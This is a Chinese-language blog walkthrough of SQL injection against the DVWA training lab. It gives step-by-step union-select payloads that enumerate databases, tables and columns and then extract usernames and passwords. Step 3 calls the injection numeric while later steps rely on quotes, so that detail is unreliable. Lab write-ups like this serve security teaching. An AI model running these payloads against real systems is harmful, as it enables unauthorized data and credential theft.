DVWA靶机sql注入

1,将dvwa的安全等级改为low
在这里插入图片描述
2,查看源代码,发现没有过滤
在这里插入图片描述
3,输入1,判断注入类型是数字型还是字符型
在这里插入图片描述
发现返回,得知是数字型。
4,1’ 报错得知存在注入点
在这里插入图片描述
5,输入1’ order by 1#
在这里插入图片描述
6,输入1’ order by 2#
在这里插入图片描述
7,输入 1’ order by 3# 报错,得知字段不超过3。
在这里插入图片描述
8,输入 1’ union select 1,2# 返回1和2
在这里插入图片描述
9,输入 1’ union select database(),version()# 返回数据库和版本信息。
10,输入 1’ union select schema_name,2 from information_schema.schemata limit 0,1# 返回第0行取1行内容 返回数据库
在这里插入图片描述
11,输入 1’ union select schema_name,2 from information_schema.schemata limit 1,1#
在这里插入图片描述
12,输入 1’ union select schema_name,2 from information_schema.schemata limit 2,1#
在这里插入图片描述
13,输入 1’ union select schema_name,2 from information_schema.schemata limit 3,1#
在这里插入图片描述
14,输入 1’ union select schema_name,2 from information_schema.schemata limit 4,1#
在这里插入图片描述
15,输入 1’ union select schema_name,2 from information_schema.schemata limit 5,1#
在这里插入图片描述
16,输入 1’ union select table_name,2 from information_schema.tables where table_schema=‘dvwa’# 返回表
在这里插入图片描述
17,输入 1’ union select column_name,column_type from information_schema.columns where table_name=‘users’# 返回字段内容
在这里插入图片描述
18,输入 1’ union select concat(user,’-’,password),2 from dvwa.users# 返回用户名和密码
在这里插入图片描述


版权声明:本文为qq_43623470原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。